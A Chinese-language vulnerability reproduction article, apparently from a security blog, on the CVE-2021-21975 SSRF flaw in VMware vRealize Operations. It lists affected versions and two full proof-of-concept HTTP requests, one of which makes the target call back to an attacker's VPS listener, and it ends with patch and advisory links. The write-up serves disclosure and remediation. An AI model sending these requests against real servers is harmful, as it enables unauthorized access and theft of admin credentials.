vRealize Operations Manager 提供跨物理、虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性。使用基本策略的自动化,操作团队实现关键过程的自动化并提高 IT 效率。
编号:CVE-2021-21975
此漏洞是vRealize Operations API管理器中的服务器端请求伪造(SSRF)漏洞,该漏洞可能允许未经身份验证的远程攻击者窃取管理密码。VMware将漏洞指定为“重要”严重等级,CVSSv3评分为8.6。
VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0
VMware Cloud Foundation 4.x、3.x
vRealize Suite Lifecycle Manager 8.x
漏洞环境下载地址:
https://my.vmware.com/zh/group/vmware/patch#search
访问生成的地址:
https://192.168.3.6
验证1:服务端请求登录
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.3.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsB
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36
["127.0.0.1:443/admin/login.action"]
验证2:vps监听
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.3.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsB
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36
["vps:6666"]
建议参考官方公告及时升级或安装相应补丁
下载链接:
https://kb.vmware.com/s/article/83210
参考链接:
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21975
本文作者:Timeline Sec
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/158561.html